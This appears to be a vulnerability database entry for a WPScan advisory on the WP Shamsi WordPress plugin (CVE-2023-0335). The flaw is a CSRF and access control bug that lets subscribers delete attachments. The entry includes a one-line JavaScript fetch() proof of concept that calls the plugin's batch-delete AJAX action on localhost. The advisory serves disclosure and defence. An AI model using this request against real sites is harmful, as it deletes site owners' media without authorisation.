Lucene search
Lana CodesWPVDB-ID:F7A20BEA-C3D5-431B-BDCF-E189C81A561AHistoryFeb 28, 2023 - 12:00 a.m.
WP Shamsi <= 4.3.3 - Subscriber+ Attachment Deletion
2023-02-2800:00:00
Lana Codes
wpscan.com
9
wordpress
csrf
access control
vulnerabilities
attachment deletion
0.001 Low
EPSS
Percentile
20.2%
The plugin has CSRF and broken access control vulnerabilities which leads user with role as low as subscriber delete attachment.
PoC
Exploit (#1 attachment id delete): fetch(‘http://localhost/wp-admin/admin-ajax.php’, { method: ‘POST’, headers: new Headers({ ‘Content-Type’: ‘application/x-www-form-urlencoded’, }), body: ‘action=exopite-sof-file-batch-delete&media-ids;%5B%5D=1&media-ids;%5B%5D=1’, redirect: ‘follow’ }).then(response => response.text()).then(result => console.log(result)).catch(error => console.log(‘error’, error));
Related
cvelist
cvelist
CVE-2023-0335 WP Shamsi <= 4.3.3 - Subscriber+ Attachment Deletion
2023-03-27 15:37:21
nvd
nvd
CVE-2023-0335
2023-03-27 16:15:08
cve
cve
CVE-2023-0335
2023-03-27 16:15:08
wpexploit
wpexploit
WP Shamsi <= 4.3.3 - Subscriber+ Attachment Deletion
2023-02-28 00:00:00
prion
prion
Improper access control
2023-03-27 16:15:00
wordfence
wordfence